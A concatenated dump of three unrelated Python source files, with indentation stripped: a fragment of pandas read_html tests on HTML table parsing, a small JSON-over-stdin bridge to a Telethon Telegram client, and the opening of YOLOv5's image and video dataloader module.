'Washington Mutual Bank(Including its subsidiary Washington '
'Mutual Bank FSB)',
'Silver State BankEn Espanol',
'AmTrade International BankEn Espanol',
'Hamilton Bank, NAEn Espanol',
'The Citizens Savings BankPioneer Community Bank, Inc.']
new = ['First Vietnamese American Bank', 'Westernbank Puerto Rico',
'R-G Premier Bank of Puerto Rico', 'Eurobank',
'Sanderson State Bank', 'Washington Mutual Bank',
'Silver State Bank', 'AmTrade International Bank',
'Hamilton Bank, NA', 'The Citizens Savings Bank']
dfnew = df.applymap(try_remove_ws).replace(old, new)
gtnew = ground_truth.applymap(try_remove_ws)
converted = dfnew._convert(datetime=True, numeric=True)
date_cols = ['Closing Date', 'Updated Date']
converted[date_cols] = converted[date_cols]._convert(datetime=True,
coerce=True)
tm.assert_frame_equal(converted, gtnew)
@pytest.mark.slow
def test_gold_canyon(self):
gc = 'Gold Canyon'
with open(self.banklist_data, 'r') as f:
raw_text = f.read()
assert gc in raw_text
df = self.read_html(self.banklist_data, 'Gold Canyon',
attrs={'id': 'table'})[0]
assert gc in df.to_string()
def test_different_number_of_cols(self):
expected = self.read_html("""<table>
<thead>
<tr style="text-align: right;">
<th></th>
<th>C_l0_g0</th>
<th>C_l0_g1</th>
<th>C_l0_g2</th>
<th>C_l0_g3</th>
<th>C_l0_g4</th>
</tr>
</thead>
<tbody>
<tr>
<th>R_l0_g0</th>
<td> 0.763</td>
<td> 0.233</td>
<td> nan</td>
<td> nan</td>
<td> nan</td>
</tr>
<tr>
<th>R_l0_g1</th>
<td> 0.244</td>
<td> 0.285</td>
<td> 0.392</td>
<td> 0.137</td>
<td> 0.222</td>
</tr>
</tbody>
</table>""", index_col=0)[0]
result = self.read_html("""<table>
<thead>
<tr style="text-align: right;">
<th></th>
<th>C_l0_g0</th>
<th>C_l0_g1</th>
<th>C_l0_g2</th>
<th>C_l0_g3</th>
<th>C_l0_g4</th>
</tr>
</thead>
<tbody>
<tr>
<th>R_l0_g0</th>
<td> 0.763</td>
<td> 0.233</td>
</tr>
<tr>
<th>R_l0_g1</th>
<td> 0.244</td>
<td> 0.285</td>
<td> 0.392</td>
<td> 0.137</td>
<td> 0.222</td>
</tr>
</tbody>
</table>""", index_col=0)[0]
tm.assert_frame_equal(result, expected)
def test_colspan_rowspan_1(self):
# GH17054
result = self.read_html("""
<table>
<tr>
<th>A</th>
<th colspan="1">B</th>
<th rowspan="1">C</th>
</tr>
<tr>
<td>a</td>
<td>b</td>
<td>c</td>
</tr>
</table>
""")[0]
expected = DataFrame([['a', 'b', 'c']], columns=['A', 'B', 'C'])
tm.assert_frame_equal(result, expected)
def test_colspan_rowspan_copy_values(self):
# GH17054
# In ASCII, with lowercase letters being copies:
#
# X x Y Z W
# A B b z C
result = self.read_html("""
<table>
<tr>
<td colspan="2">X</td>
<td>Y</td>
<td rowspan="2">Z</td>
<td>W</td>
</tr>
<tr>
<td>A</td>
<td colspan="2">B</td>
<td>C</td>
</tr>
</table>
""", header=0)[0]
expected = DataFrame(data=[['A', 'B', 'B', 'Z', 'C']],
columns=['X', 'X.1', 'Y', 'Z', 'W'])
tm.assert_frame_equal(result, expected)
def test_colspan_rowspan_both_not_1(self):
# GH17054
# In ASCII, with lowercase letters being copies:
#
# A B b b C
# a b b b D
result = self.read_html("""
<table>
<tr>
<td rowspan="2">A</td>
<td rowspan="2" colspan="3">B</td>
<td>C</td>
</tr>
<tr>
<td>D</td>
</tr>
</table>
""", header=0)[0]
expected = DataFrame(data=[['A', 'B', 'B', 'B', 'D']],
columns=['A', 'B', 'B.1', 'B.2', 'C'])
tm.assert_frame_equal(result, expected)
def test_rowspan_at_end_of_row(self):
# GH17054
# In ASCII, with lowercase letters being copies:
#
# A B
# C b
result = self.read_html("""
<table>
<tr>
<td>A</td>
<td rowspan="2">B</td>
</tr>
<tr>
<td>C</td>
</tr>
</table>
""", header=0)[0]
expected = DataFrame(data=[['C', 'B']], columns=['A', 'B'])
tm.assert_frame_equal(result, expected)
def test_rowspan_only_rows(self):
# GH17054
result = self.read_html("""
<table>
<tr>
<td rowspan="3">A</td>
<td rowspan="3">B</td>
</tr>
</table>
""", header=0)[0]
expected = DataFrame(data=[['A', 'B'], ['A', 'B']],
columns=['A', 'B'])
tm.assert_frame_equal(result, expected)
def test_header_inferred_from_rows_with_only_th(self):
# GH17054
result = self.read_html("""
<table>
<tr>
<th>A</th>
<th>B</th>
</tr>
<tr>
<th>a</th>
<th>b</th>
</tr>
<tr>
<td>1</td>
<td>2</td>
</tr>
</table>
""")[0]
columns = MultiIndex(levels=[['A', 'B'], ['a', 'b']],
codes=[[0, 1], [0, 1]])
expected = DataFrame(data=[[1, 2]], columns=columns)
tm.assert_frame_equal(result, expected)
def test_parse_dates_list(self):
df = DataFrame({'date': date_range('1/1/2001', periods=10)})
expected = df.to_html()
res = self.read_html(expected, parse_dates=[1], index_col=0)
tm.assert_frame_equal(df, res[0])
res = self.read_html(expected, parse_dates=['date'], index_col=0)
tm.assert_frame_equal(df, res[0])
def test_parse_dates_combine(self):
raw_dates = Series(date_range('1/1/2001', periods=10))
df = DataFrame({'date': raw_dates.map(lambda x: str(x.date())),
'time': raw_dates.map(lambda x: str(x.time()))})
res = self.read_html(df.to_html(), parse_dates={'datetime': [1, 2]},
index_col=1)
newdf = DataFrame({'datetime': raw_dates})
tm.assert_frame_equal(newdf, res[0])
def test_computer_sales_page(self, datapath):
data = datapath('io', 'data', 'computer_sales_page.html')
msg = (r"Passed header=\[0,1\] are too many "
r"rows for this multi_index of columns")
with pytest.raises(ParserError, match=msg):
self.read_html(data, header=[0, 1])
data = datapath('io', 'data', 'computer_sales_page.html')
assert self.read_html(data, header=[1, 2])
def test_wikipedia_states_table(self, datapath):
data = datapath('io', 'data', 'wikipedia_states.html')
assert os.path.isfile(data), '%r is not a file' % data
assert os.path.getsize(data), '%r is an empty file' % data
result = self.read_html(data, 'Arizona', header=1)[0]
assert result['sq mi'].dtype == np.dtype('float64')
def test_parser_error_on_empty_header_row(self):
msg = (r"Passed header=\[0,1\] are too many "
r"rows for this multi_index of columns")
with pytest.raises(ParserError, match=msg):
self.read_html("""
<table>
<thead>
<tr><th></th><th></tr>
<tr><th>A</th><th>B</th></tr>
</thead>
<tbody>
<tr><td>a</td><td>b</td></tr>
</tbody>
</table>
""", header=[0, 1])
def test_decimal_rows(self):
# GH 12907
result = self.read_html('''<html>
<body>
<table>
<thead>
<tr>
<th>Header</th>
</tr>
</thead>
<tbody>
<tr>
<td>1100#101</td>
</tr>
</tbody>
</table>
</body>
</html>''', decimal='#')[0]
expected = DataFrame(data={'Header': 1100.101}, index=[0])
assert result['Header'].dtype == np.dtype('float64')
tm.assert_frame_equal(result, expected)
def test_bool_header_arg(self):
# GH 6114
for arg in [True, False]:
with pytest.raises(TypeError):
self.read_html(self.spam_data, header=arg)
def test_converters(self):
# GH 13461
result = self.read_html(
"""<table>
<thead>
<tr>
<th>a</th>
</tr>
</thead>
<tbody>
<tr>
<td> 0.763</td>
</tr>
<tr>
<td> 0.244</td>
</tr>
</tbody>
</table>""",
converters={'a': str}
)[0]
expected = DataFrame({'a': ['0.763', '0.244']})
tm.assert_frame_equal(result, expected)
def test_na_values(self):
# GH 13461
result = self.read_html(
"""<table>
<thead>
<tr>
<th>a</th>
</tr>
</thead>
<tbody>
<tr>
<td> 0.763</td>
</tr>
<tr>
<td> 0.244</td>
</tr>
</tbody>
</table>""",
na_values=[0.244])[0]
expected = DataFrame({'a': [0.763, np.nan]})
tm.assert_frame_equal(result, expected)
def test_keep_default_na(self):
html_data = """<table>
<thead>
<tr>
<th>a</th>
</tr>
</thead>
<tbody>
<tr>
<td> N/A</td>
</tr>
<tr>
<td> NA</td>
</tr>
</tbody>
</table>"""
expected_df = DataFrame({'a': ['N/A', 'NA']})
html_df = self.read_html(html_data, keep_default_na=False)[0]
tm.assert_frame_equal(expected_df, html_df)
expected_df = DataFrame({'a': [np.nan, np.nan]})
html_df = self.read_html(html_data, keep_default_na=True)[0]
tm.assert_frame_equal(expected_df, html_df)
def test_preserve_empty_rows(self):
result = self.read_html("""
<table>
<tr>
<th>A</th>
<th>B</th>
</tr>
<tr>
<td>a</td>
<td>b</td>
</tr>
<tr>
<td></td>
<td></td>
</tr>
</table>
""")[0]
expected = DataFrame(data=[['a', 'b'], [np.nan, np.nan]],
columns=['A', 'B'])
tm.assert_frame_equal(result, expected)
def test_ignore_empty_rows_when_inferring_header(self):
result = self.read_html("""
<table>
<thead>
<tr><th></th><th></tr>
<tr><th>A</th><th>B</th></tr>
<tr><th>a</th><th>b</th></tr>
</thead>
<tbody>
<tr><td>1</td><td>2</td></tr>
</tbody>
</table>
""")[0]
columns = MultiIndex(levels=[['A', 'B'], ['a', 'b']],
codes=[[0, 1], [0, 1]])
expected = DataFrame(data=[[1, 2]], columns=columns)
tm.assert_frame_equal(result, expected)
def test_multiple_header_rows(self):
# Issue #13434
expected_df = DataFrame(data=[("Hillary", 68, "D"),
("Bernie", 74, "D"),
("Donald", 69, "R")])
expected_df.columns = [["Unnamed: 0_level_0", "Age", "Party"],
["Name", "Unnamed: 1_level_1",
"Unnamed: 2_level_1"]]
html = expected_df.to_html(index=False)
html_df = self.read_html(html, )[0]
tm.assert_frame_equal(expected_df, html_df)
def test_works_on_valid_markup(self, datapath):
filename = datapath('io', 'data', 'valid_markup.html')
dfs = self.read_html(filename, index_col=0)
assert isinstance(dfs, list)
assert isinstance(dfs[0], DataFrame)
@pytest.mark.slow
def test_fallback_success(self, datapath):
banklist_data = datapath('io', 'data', 'banklist.html')
self.read_html(banklist_data, '.*Water.*', flavor=['lxml', 'html5lib'])
def test_to_html_timestamp(self):
rng = date_range('2000-01-01', periods=10)
df = DataFrame(np.random.randn(10, 4), index=rng)
result = df.to_html()
assert '2000-01-01' in result
@pytest.mark.parametrize("displayed_only,exp0,exp1", [
(True, DataFrame(["foo"]), None),
(False, DataFrame(["foo bar baz qux"]), DataFrame(["foo"]))])
def test_displayed_only(self, displayed_only, exp0, exp1):
# GH 20027
data = StringIO("""<html>
<body>
<table>
<tr>
<td>
foo
<span style="display:none;text-align:center">bar</span>
<span style="display:none">baz</span>
<span style="display: none">qux</span>
</td>
</tr>
</table>
<table style="display: none">
<tr>
<td>foo</td>
</tr>
</table>
</body>
</html>""")
dfs = self.read_html(data, displayed_only=displayed_only)
tm.assert_frame_equal(dfs[0], exp0)
if exp1 is not None:
tm.assert_frame_equal(dfs[1], exp1)
else:
assert len(dfs) == 1 # Should not parse hidden table
def test_encode(self, html_encoding_file):
_, encoding = os.path.splitext(
os.path.basename(html_encoding_file)
)[0].split('_')
try:
with open(html_encoding_file, 'rb') as fobj:
from_string = self.read_html(fobj.read(), encoding=encoding,
index_col=0).pop()
with open(html_encoding_file, 'rb') as fobj:
from_file_like = self.read_html(BytesIO(fobj.read()),
encoding=encoding,
index_col=0).pop()
from_filename = self.read_html(html_encoding_file,
encoding=encoding,
index_col=0).pop()
tm.assert_frame_equal(from_string, from_file_like)
tm.assert_frame_equal(from_string, from_filename)
except Exception:
# seems utf-16/32 fail on windows
if is_platform_windows():
if '16' in encoding or '32' in encoding:
pytest.skip()
raise
def test_parse_failure_unseekable(self):
# Issue #17975
if self.read_html.keywords.get('flavor') == 'lxml':
pytest.skip("Not applicable for lxml")
class UnseekableStringIO(StringIO):
def seekable(self):
return False
bad = UnseekableStringIO('''
<table><tr><td>spam<foobr />eggs</td></tr></table>''')
assert self.read_html(bad)
with pytest.raises(ValueError,
match='passed a non-rewindable file object'):
self.read_html(bad)
def test_parse_failure_rewinds(self):
# Issue #17975
class MockFile:
def __init__(self, data):
self.data = data
self.at_end = False
def read(self, size=None):
data = '' if self.at_end else self.data
self.at_end = True
return data
def seek(self, offset):
self.at_end = False
def seekable(self):
return True
good = MockFile('<table><tr><td>spam<br />eggs</td></tr></table>')
bad = MockFile('<table><tr><td>spam<foobr />eggs</td></tr></table>')
assert self.read_html(good)
assert self.read_html(bad)
@pytest.mark.slow
def test_importcheck_thread_safety(self, datapath):
# see gh-16928
class ErrorThread(threading.Thread):
def run(self):
try:
super().run()
except Exception as e:
self.err = e
else:
self.err = None
# force import check by reinitalising global vars in html.py
reload(pandas.io.html)
filename = datapath('io', 'data', 'valid_markup.html')
helper_thread1 = ErrorThread(target=self.read_html, args=(filename,))
helper_thread2 = ErrorThread(target=self.read_html, args=(filename,))
helper_thread1.start()
helper_thread2.start()
while helper_thread1.is_alive() or helper_thread2.is_alive():
pass
assert None is helper_thread1.err is helper_thread2.err
|
php.py
|
import json
import sys
import threading
from telethon.sync import TelegramClient
import asyncio
updates = []
running = False
def write(array):
print(json.dumps(array, default=str))
async def callback(event):
global updates
updates.append(event.to_dict())
def newCallback():
client.add_event_handler(callback)
client.run_until_disconnected()
def callClient(request):
if running: # broken
loop = asyncio.get_event_loop()
if type(request['args']) is dict:
response = loop.run_until_complete(
getattr(client, request['method'])(**request['args']))
else:
response = loop.run_until_complete(
getattr(client, request['method'])(*request['args']))
try:
response = response.to_dict()
except:
pass
else:
if type(request['args']) is dict:
response = getattr(client, request['method'])(**request['args'])
else:
response = getattr(client, request['method'])(*request['args'])
try:
response = response.to_dict()
except:
pass
return response
while True:
try:
request = json.loads(input())
if request['type'] == 'new TelegramClient':
client = TelegramClient(
request['name'], request['api_id'], request['api_hash'])
write({'type': 'response', 'success': True})
if request['type'] == 'exit':
write({'type': 'response', 'success': True})
quit()
if request['type'] == 'TelegramClient':
response = callClient(request)
write({'type': 'response', 'success': True, 'response': response})
if request['type'] == 'new callback':
running = True
threading.Thread(target=newCallback, daemon=True).start()
write({'type': 'response', 'success': True})
if request['type'] == 'getUpdate':
while True:
if updates:
write({'type': 'event', 'event': updates[0]})
del updates[0]
break
except Exception as e:
write({'type': 'error', 'success': False,
'error': str(e), 'exception': type(e).__name__})
|
datasets.py
|
# YOLOv5 🚀 by Ultralytics, GPL-3.0 license
"""
Dataloaders and dataset utils
"""
import glob
import hashlib
import json
import logging
import os
import random
import shutil
import time
from itertools import repeat
from multiprocessing.pool import ThreadPool, Pool
from pathlib import Path
from threading import Thread
from zipfile import ZipFile
import cv2
import numpy as np
import torch
import torch.nn.functional as F
import yaml
from PIL import Image, ImageOps, ExifTags
from torch.utils.data import Dataset
from tqdm import tqdm
from utils.augmentations import Albumentations, augment_hsv, copy_paste, letterbox, mixup, random_perspective
from utils.general import check_dataset, check_requirements, check_yaml, clean_str, segments2boxes, \
xywh2xyxy, xywhn2xyxy, xyxy2xywhn, xyn2xy, LOGGER
from utils.torch_utils import torch_distributed_zero_first
# Parameters
HELP_URL = 'https://github.com/ultralytics/yolov5/wiki/Train-Custom-Data'
IMG_FORMATS = ['bmp', 'jpg', 'jpeg', 'png', 'tif', 'tiff', 'dng', 'webp', 'mpo'] # acceptable image suffixes
VID_FORMATS = ['mov', 'avi', 'mp4', 'mpg', 'mpeg', 'm4v', 'wmv', 'mkv'] # acceptable video suffixes
NUM_THREADS = min(8, os.cpu_count()) # number of multiprocessing threads
# Get orientation exif tag
for orientation in ExifTags.TAGS.keys():
if ExifTags.TAGS[orientation] == 'Orientation':
break
def get_hash(paths):
# Returns a single hash value of a list of paths (files or dirs)
size = sum(os.path.getsize(p) for p in paths if os.path.exists(p)) # sizes
h = hashlib.md5(str(size).encode()) # hash sizes
h.update(''.join(paths).encode()) # hash paths
return h.hexdigest() # return hash
def exif_size(img):
# Returns exif-corrected PIL size
s = img.size # (width, height)
try:
rotation = dict(img._getexif().items())[orientation]
if rotation == 6: # rotation 270
s = (s[1], s[0])
elif rotation == 8: # rotation 90
s = (s[1], s[0])
except:
pass
return s
def exif_transpose(image):
"""
Transpose a PIL image accordingly if it has an EXIF Orientation tag.
Inplace version of https://github.com/python-pillow/Pillow/blob/master/src/PIL/ImageOps.py exif_transpose()
:param image: The image to transpose.
:return: An image.
"""
exif = image.getexif()
orientation = exif.get(0x0112, 1) # default 1
if orientation > 1:
method = {2: Image.FLIP_LEFT_RIGHT,
3: Image.ROTATE_180,
4: Image.FLIP_TOP_BOTTOM,
5: Image.TRANSPOSE,
6: Image.ROTATE_270,
7: Image.TRANSVERSE,
8: Image.ROTATE_90,
}.get(orientation)
if method is not None:
image = image.transpose(method)
del exif[0x0112]
image.info["exif"] = exif.tobytes()
return image
def create_dataloader(path, imgsz, batch_size, stride, single_cls=False, hyp=None, augment=False, cache=False, pad=0.0,
rect=False, rank=-1, workers=8, image_weights=False, quad=False, prefix=''):
# Make sure only the first process in DDP process the dataset first, and the following others can use the cache
with torch_distributed_zero_first(rank):
dataset = LoadImagesAndLabels(path, imgsz, batch_size,
augment=augment, # augment images
hyp=hyp, # augmentation hyperparameters
rect=rect, # rectangular training
cache_images=cache,
single_cls=single_cls,
stride=int(stride),
pad=pad,
image_weights=image_weights,
prefix=prefix)
batch_size = min(batch_size, len(dataset))
nw = min([os.cpu_count(), batch_size if batch_size > 1 else 0, workers]) # number of workers
sampler = torch.utils.data.distributed.DistributedSampler(dataset) if rank != -1 else None
loader = torch.utils.data.DataLoader if image_weights else InfiniteDataLoader
# Use torch.utils.data.DataLoader() if dataset.properties will update during training else InfiniteDataLoader()
dataloader = loader(dataset,
batch_size=batch_size,
num_workers=nw,
sampler=sampler,
pin_memory=True,
collate_fn=LoadImagesAndLabels.collate_fn4 if quad else LoadImagesAndLabels.collate_fn)
return dataloader, dataset
class InfiniteDataLoader(torch.utils.data.dataloader.DataLoader):
""" Dataloader that reuses workers
Uses same syntax as vanilla DataLoader
"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
object.__setattr__(self, 'batch_sampler', _RepeatSampler(self.batch_sampler))
self.iterator = super().__iter__()
def __len__(self):
return len(self.batch_sampler.sampler)
def __iter__(self):
for i in range(len(self)):
yield next(self.iterator)
class _RepeatSampler:
""" Sampler that repeats forever
Args:
sampler (Sampler)
"""
def __init__(self, sampler):
self.sampler = sampler
def __iter__(self):
while True:
yield from iter(self.sampler)
class LoadImages:
# YOLOv5 image/video dataloader, i.e. `python detect.py --source image.jpg/vid.mp4`
def __init__(self, path, img_size=640, stride=32, auto=True):
p = str(Path(path).resolve()) # os-agnostic absolute path
if '*' in p:
files = sorted(glob.glob(p, recursive=True)) # glob
elif os.path.isdir(p):
files = sorted(glob.glob(os.path.join(p, '*.*'))) # dir
elif os.path.isfile(p):
files = [p] # files
else:
raise Exception(f'ERROR: {p} does not exist')
images = [x for x in files if x.split('.')[-1].lower() in IMG_FORMATS]
videos = [x for x in files if x.split('.')[-1].lower() in VID_FORMATS]
ni, nv = len(images), len(videos)
self.img_size = img_size
self.stride = stride
self.files = images + videos
self.nf = ni + nv # number of files
self.video_flag = [False] * ni + [True] * nv
self.mode = 'image'
self.auto = auto
if any(videos):
self.new_video(videos[0]) # new video
else:
self.cap = None
assert self.nf > 0, f'No images or videos found in {p}. ' \
f'Supported formats are:\nimages: {IMG_FORMATS}\nvideos: {VID_FORMATS}'
def __iter__(self):
self.count = 0
return self
def __next__(self):
if self.count == self.nf:
raise StopIteration
path = self.files[self.count]
if self.video_flag[self.count]:
# Read video
self.mode = 'video'
ret_val, img0 = self.cap.read()
if not ret_val:
self.count += 1
self.cap.release()
if self.count == self.nf: # last video
raise StopIteration
else:
path = self.files[self.count]
self.new_video(path)
ret_val, img0 = self.cap.read()
self.frame += 1
s = f'video {self.count + 1}/{self.nf} ({self.frame}/{self.frames}) {path}: '
else:
# Read image
self.count += 1
img0 = cv2.imread(path) # BGR
assert img0 is not None, f'Image Not Found {path}'
s = f'image {self.count}/{self.nf} {path}: '
# Padded resize
img = letterbox(img0, self.img_size, stride=self.stride, auto=self.auto)[0]
# Convert
img = img.transpose((2, 0, 1))[::-1] # HWC to CHW, BGR to RGB
img = np.ascontiguousarray(img)
return path, img, img0, self.cap, s
def new_video(self, path):
self.frame = 0
self.cap = cv2.VideoCapture(path)
self.frames = int(self.cap.get(cv2.CAP_PROP_FRAME_COUNT))
def __len__(self):
return self.nf # number of files
class LoadWebcam: # for inference
# YOLOv5 local webcam dataloader, i.e. `python detect.py --source 0`
def __init__(self, pipe='0', img_size=640, stride=32):
self.img_size = img_size
self.stride = stride
self.pipe = eval(pipe) if pipe.isnumeric() else pipe
self.cap = cv2.VideoCapture(self.pipe) # video capture object
self.cap.set(cv2.CAP_PROP_BUFFERSIZE, 3) # set buffer size
def __iter__(self):
self.count = -1
return self
def __next__(self):
self.count += 1
if cv2.waitKey(1) == ord('q'): # q to quit
self.cap.release()
cv2.destroyAllWindows()
raise StopIteration
# Read frame
ret_val, img0 = self.cap.read()
img0 = cv2.flip(img0, 1) # flip left-right
# Print
assert ret_val, f'Camera Error {self.pipe}'
img_path = 'webcam.jpg'
s = f'webcam {self.count}: '
# Padded resize
img = letterbox(img0, self.img_size, stride=self.stride)[0]
# Convert
img = img.transpose((2, 0, 1))[::-1] # HWC to CHW, BGR to RGB
img = np.ascontiguousarray(img)
return img_path, img, img0, None, s
def __len__(self):
return 0
class LoadStreams:
# YOLOv5 streamloader, i.e. `python detect.py --source 'rtsp://example.com/media.mp4' # RTSP, RTMP, HTTP streams`
def __init__(self, sources='streams.txt', img_size=640, stride=32, auto=True):
self.mode = 'stream'
self.img_size = img_size
self.stride = stride
if os.path.isfile(sources):
with open(sources) as f:
sources = [x.strip() for x in f.read().strip().splitlines() if len(x.strip())]
else:
sources = [sources]
n = len(sources)
self.imgs, self.fps, self.frames, self.threads = [None] * n, [0] * n, [0] * n, [None] * n
self.sources = [clean_str(x) for x in sources] # clean source names for later
self.auto = auto
for i, s in enumerate(sources): # index, source
# Start thread to read frames from video stream
st = f'{i + 1}/{n}: {s}... '
if 'youtube.com/' in s or 'youtu.be/' in s: # if source is YouTube video
check_requirements(('pafy', 'youtube_dl'))
import pafy
s = pafy.new(s).getbest(preftype="mp4").url # YouTube URL
s = eval(s) if s.isnumeric() else s # i.e. s = '0' local webcam
cap = cv2.VideoCapture(s)
assert cap.isOpened(), f'{st}Failed to open {s}'
w = int(cap.get(cv2.CAP_PROP_FRAME_WIDTH))
h = int(cap.get(cv2.CAP_PROP_FRAME_HEIGHT))
self.fps[i] = max(cap.get(cv2.CAP_PROP_FPS) % 100, 0) or 30.0 # 30 FPS fallback
self.frames[i] = max(int(cap.get(cv2.CAP_PROP_FRAME_COUNT)), 0) or float('inf') # infinite stream fallback
_, self.imgs[i] = cap.read() # guarantee first frame
self.threads[i] = Thread(target=self.update, args=([i, cap, s]), daemon=True)
LOGGER.info(f"{st} Success ({self.frames[i]} frames {w}x{h} at {self.fps[i]:.2f} FPS)")
self.threads[i].start()
LOGGER.info('') # newline
# check for common shapes
s = np.stack([letterbox(x, self.img_size, stride=self.stride, auto=self.auto)[0].shape for x in self.imgs])
self.rect = np.unique(s, axis=0).shape[0] == 1 # rect inference if all shapes equal
if not self.rect:
LOGGER.warning('WARNING: Stream shapes differ. For optimal performance supply similarly-shaped streams.')
def update(self, i, cap, stream):
# Read stream `i` frames in daemon thread
n, f, read = 0, self.frames[i], 1 # frame number, frame array, inference every 'read' frame
while cap.isOpened() and n < f:
n += 1
# _, self.imgs[index] = cap.read()
cap.grab()
if n % read == 0:
success, im = cap.retrieve()
if success:
self.imgs[i] = im
else:
LOGGER.warn('WARNING: Video stream unresponsive, please check your IP camera connection.')
self.imgs[i] *= 0
cap.open(stream) # re-open stream if signal was lost
time.sleep(1 / self.fps[i]) # wait time
def __iter__(self):
self.count = -1
return self
def __next__(self):
self.count += 1
if not all(x.is_alive() for x in self.threads) or cv2.waitKey(1) == ord('q'): # q to quit
cv2.destroyAllWindows()
raise StopIteration
# Letterbox
img0 = self.imgs.copy()
img = [letterbox(x, self.img_size, stride=self.stride, auto=self.rect and self.auto)[0] for x in img0]
# Stack
img = np.stack(img, 0)
# Convert
img = img[..., ::-1].transpose((0, 3, 1, 2)) # BGR to RGB, BHWC to BCHW
img = np.ascontiguousarray(img)
return self.sources, img, img0, None, ''
def __len__(self):
return len(self.sources) # 1E12 frames = 32 streams at 30 FPS for 30 years
def img2label_paths(img_paths):
# Define label paths as a function of image paths
sa, sb = os.sep + 'images' + os.sep, os.sep + 'labels' + os.sep # /images/, /labels/ substrings
return [sb.join(x.rsplit(sa, 1)).rsplit('.', 1)[0] + '.txt' for x in img_paths]
class LoadImagesAndLabels(Dataset):
# YOLOv5 train_loader/val_loader, loads images and labels for training and validation
cache_version = 0.6 # dataset labels *.cache version
def __init__(self, path, img_size=640, batch_size=16, augment=False, hyp=None, rect=False, image_weights=False,
cache_images=False, single_cls=False, stride=32, pad=0.0, prefix=''):
self.img_size = img_size
self.augment = augment
self.hyp = hyp
self.image_weights = image_weights
self.rect = False if image_weights else rect
self.mosaic = self.augment and not self.rect # load 4 images at a time into a mosaic (only during training)
self.mosaic_border = [-img_size // 2, -img_size // 2]
self.stride = stride
self.path = path
self.albumentations = Albumentations() if augment else None
try:
f = [] # image files
for p in path if isinstance(path, list) else [path]:
p = Path(p) # os-agnostic
if p.is_dir(): # dir
f += glob.glob(str(p / '**' / '*.*'), recursive=True)
# f = list(p.rglob('*.*')) # pathlib
elif p.is_file(): # file
with open(p) as t:
t = t.read().strip().splitlines()
parent = str(p.parent) + os.sep
f += [x.replace('./', parent) if x.startswith('./') else x for x in t] # local to global path
# f += [p.parent / x.lstrip(os.sep) for x in t] # local to global path (pathlib)
else:
raise Exception(f'{prefix}{p} does not exist')
self.img_files = sorted(x.replace('/', os.sep) for x in f if x.split('.')[-1].lower() in IMG_FORMATS)
# self.img_files = sorted([x for x in f if x.suffix[1:].lower() in IMG_FORMATS]) # pathlib
assert self.img_files, f'{prefix}No images found'
except Exception as e:
raise Exception(f'{prefix}Error loading data from {path}: {e}\nSee {HELP_URL}')
# Check cache
self.label_files = img2label_paths(self.img_files) # labels
cache_path = (p if p.is_file() else Path(self.label_files[0]).parent).with_suffix('.cache')
try:
cache, exists = np.load(cache_path, allow_pickle=True).item(), True # load dict
assert cache['version'] == self.cache_version # same version
assert cache['hash'] == get_hash(self.label_files + self.img_files) # same hash
except:
cache, exists = self.cache_labels(cache_path, prefix), False # cache
# Display cache
nf, nm, ne, nc, n = cache.pop('results') # found, missing, empty, corrupted, total
if exists:
d = f"Scanning '{cache_path}' images and labels... {nf} found, {nm} missing, {ne} empty, {nc} corrupted"
tqdm(None, desc=prefix + d, total=n, initial=n) # display cache results
if cache['msgs']:
logging.info('\n'.join(cache['msgs'])) # display warnings
assert nf > 0 or not augment, f'{prefix}No labels in {cache_path}. Can not train without labels. See {HELP_URL}'
# Read cache
[cache.pop(k) for k in ('hash', 'version', 'msgs')] # remove items
labels, shapes, self.segments = zip(*cache.values())
self.labels = list(labels)
self.shapes = np.array(shapes, dtype=np.float64)
self.img_files = list(cache.keys()) # update
self.label_files = img2label_paths(cache.keys()) # update
n = len(shapes) # number of images
bi = np.floor(np.arange(n) / batch_size).astype(np.int) # batch index
nb = bi[-1] + 1 # number of batches
self.batch = bi # batch index of image
self.n = n
self.indices = range(n)
# Update labels
include_class = [] # filter labels to include only these classes (optional)
include_class_array = np.array(include_class).reshape(1, -1)
for i, (label, segment) in enumerate(zip(self.labels, self.segments)):
if include_class:
j = (label[:, 0:1] == include_class_array).any(1)
self.labels[i] = label[j]
if segment:
self.segments[i] = segment[j]
if single_cls: # single-class training, merge all classes into 0
self.labels[i][:, 0] = 0
if segment:
self.segments[i][:, 0] = 0
# Rectangular Training
if self.rect:
# Sort by aspect ratio
s = self.shapes # wh
ar = s[:, 1] / s[:, 0] # aspect ratio
irect = ar.argsort()
self.img_files = [self.img_files[i] for i in irect]
self.label_files = [self.label_files[i] for i in irect]
self.labels = [self.labels[i] for i in irect]
self.shapes = s[irect] # wh
ar = ar[irect]
# Set training image shapes
shapes = [[1, 1]] * nb
for i in range(nb):
ari = ar[bi == i]
mini, maxi = ari.min(), ari.max()
if maxi < 1:
shapes[i] = [maxi, 1]
elif mini > 1:
shapes[i] = [1, 1 / mini]
self.batch_shapes = np.ceil(np.array(shapes) * img_size / stride + pad).astype(np.int) * stride
# Cache images into memory for faster training (WARNING: large datasets may exceed system RAM)
self.imgs, self.img_npy = [None] * n, [None] * n
if cache_images:
if cache_images == 'disk':
self.im_cache_dir = Path(Path(self.img_files[0]).parent.as_posix() + '_npy')
self.img_npy = [self.im_cache_dir / Path(f).with_suffix('.npy').name for f in self.img_files]
self.im_cache_dir.mkdir(parents=True, exist_ok=True)
gb = 0 # Gigabytes of cached images
self.img_hw0, self.img_hw = [None] * n, [None] * n
results = ThreadPool(NUM_THREADS).imap(lambda x: load_image(*x), zip(repeat(self), range(n)))
pbar = tqdm(enumerate(results), total=n)
for i, x in pbar:
if cache_images == 'disk':
if not self.img_npy[i].exists():
np.save(self.img_npy[i].as_posix(), x[0])
gb += self.img_npy[i].stat().st_size
else:
self.imgs[i], self.img_hw0[i], self.img_hw[i] = x # im, hw_orig, hw_resized = load_image(self, i)
gb += self.imgs[i].nbytes
pbar.desc = f'{prefix}Caching images ({gb / 1E9:.1f}GB {cache_images})'
pbar.close()
def cache_labels(self, path=Path('./labels.cache'), prefix=''):
# Cache dataset labels, check images and read shapes
x = {} # dict
nm, nf, ne, nc, msgs = 0, 0, 0, 0, [] # number missing, found, empty, corrupt, messages
desc = f"{prefix}Scanning '{path.parent / path.stem}' images and labels..."
with Pool(NUM_THREADS) as pool:
pbar = tqdm(pool.imap(verify_image_label, zip(self.img_files, self.label_files, repeat(prefix))),
desc=desc, total=len(self.img_files))
for im_file, l, shape, segments, nm_f, nf_f, ne_f, nc_f, msg in pbar:
nm += nm_f
nf += nf_f
ne += ne_f
nc += nc_f
if im_file:
x[im_file] = [l, shape, segments]
if msg:
msgs.append(msg)
